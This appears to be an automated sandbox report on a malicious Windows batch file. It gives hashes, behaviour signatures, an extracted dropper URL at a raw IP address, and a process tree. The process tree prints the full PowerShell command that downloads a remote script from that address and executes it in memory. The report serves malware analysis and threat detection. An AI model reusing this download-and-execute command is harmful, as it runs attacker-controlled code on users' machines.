Analysis
-
max time kernel
108s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
17-03-2020 17:10
General
-
Target
ydPBfFLN.bat
-
Size
196B
-
MD5
50fdb1991ec03a3aa2a0e43f003b45fa
-
SHA1
fd5349455dc0e38995beffbb501656e0cb76b8f3
-
SHA256
36b783132e9054391ec692f5470a2e2b0a9cdce7a09018477bb7eeefa7fc6739
-
SHA512
e7f5f38700f49162fae8c8f3a0ac9a06cac833321c2c39235f10c711c69de29dc9c4dca5806bd89810e1e2fcdbd3e0e3cd2a4e76ba2965baac703d7aeb0f1b82
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ydPBfFLN
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ydPBfFLN.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ydPBfFLN');Invoke-MWMIOGLDAXQVF;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB